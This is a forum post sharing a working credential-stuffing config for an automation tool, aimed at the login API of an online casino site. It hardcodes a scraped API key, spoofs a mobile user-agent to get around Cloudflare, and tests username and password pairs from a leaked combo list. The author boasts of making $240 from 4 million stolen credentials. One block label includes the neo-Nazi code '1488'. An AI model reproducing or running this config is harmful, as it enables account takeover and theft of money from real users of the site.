OP 23 May, 2022 - 04:23 PM
hello!
this is a pretty shitty config
but fuck it
it works
I got only 240$ over 4million paid combo
not recomending this config, but as you wish .
this is a pretty shitty config
but fuck it
it works
I got only 240$ over 4million paid combo
not recomending this config, but as you wish .
Code:
BLOCK:HttpRequest
DISABLED
LABEL:FUCK CLOUDFLARE 1488
url = "https://www.au-slots.com/static/js/2.da528a63.chunk.js"
securityProtocol = TLS13
customHeaders = {("User-Agent", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.5.59 (like Safari/604.1)"), ("Pragma", "no-cache"), ("Accept", "*/*"), ("Accept-Language", "en-US,en;q=0.8")}
TYPE:STANDARD
$""
"application/x-www-form-urlencoded"
ENDBLOCK
BLOCK:Keycheck
DISABLED
KEYCHAIN SUCCESS OR
STRINGKEY @data.SOURCE DoesNotContain "class=\"ray_id\">Ray ID"
KEYCHAIN ERROR OR
STRINGKEY @data.SOURCE Contains "class=\"ray_id\">Ray ID"
ENDBLOCK
BLOCK:Parse
DISABLED
LABEL:parsing apikey
input = @data.SOURCE
leftDelim = "REACT_APP_BACKEND_API_KEY:\""
rightDelim = "\""
MODE:LR
=> VAR @apikey
ENDBLOCK
BLOCK:Parse
LABEL:api key [will need updatign from time to time]
input = "BgpHper1yRF4LvKHx3EaAdsEDhWsWjQj"
MODE:LR
=> VAR @apikey
ENDBLOCK
BLOCK:HttpRequest
url = "https://spa.au-slots2.com/api/bog/v2_1_1/anon"
securityProtocol = TLS12
customHeaders = ${("Accept", "application/json, text/plain, */*"), ("Accept-Encoding", "gzip, deflate, br"), ("Accept-Language", "en-US,en;q=0.9"), ("api-key", "<apikey>"), ("Cache-Control", "no-cache"), ("Connection", "keep-alive"), ("Host", "spa.au-slots2.com"), ("Origin", "https://www.au-slots.com"), ("Pragma", "no-cache"), ("Referer", "https://www.au-slots.com/"), ("Sec-Fetch-Dest", "empty"), ("Sec-Fetch-Mode", "cors"), ("Sec-Fetch-Site", "cross-site"), ("Sec-GPC", "1"), ("User-Agent", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.5.59 (like Safari/604.1)"), ("x-language", "en_EN")}
TYPE:STANDARD
$""
"application/x-www-form-urlencoded"
ENDBLOCK
BLOCK:Parse
input = @data.HEADERS["X-Anon-Session"]
MODE:LR
=> VAR @xanon
ENDBLOCK
BLOCK:Parse
input = @input.USER
rightDelim = "@"
MODE:LR
=> VAR @username
ENDBLOCK
BLOCK:HttpRequest
url = "https://spa.au-slots2.com/api/bog/v2_1_1/player/login"
method = POST
securityProtocol = TLS12
customHeaders = ${("api-key", "<apikey>"), ("User-Agent", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.5.59 (like Safari/604.1)"), ("x-anon-session", "<xanon>"), ("x-language", "en_EN")}
TYPE:STANDARD
$"{\"username\":\"<username>\",\"password\":\"<input.PASS>\"}"
"application/json"
ENDBLOCK
BLOCK:Keycheck
KEYCHAIN SUCCESS OR
STRINGKEY @data.SOURCE Contains "success\":true"
KEYCHAIN FAIL OR
STRINGKEY @data.SOURCE Contains "success\":false"
KEYCHAIN ERROR OR
STRINGKEY @data.SOURCE Contains "class=\"ray_id\">Ray ID"
ENDBLOCK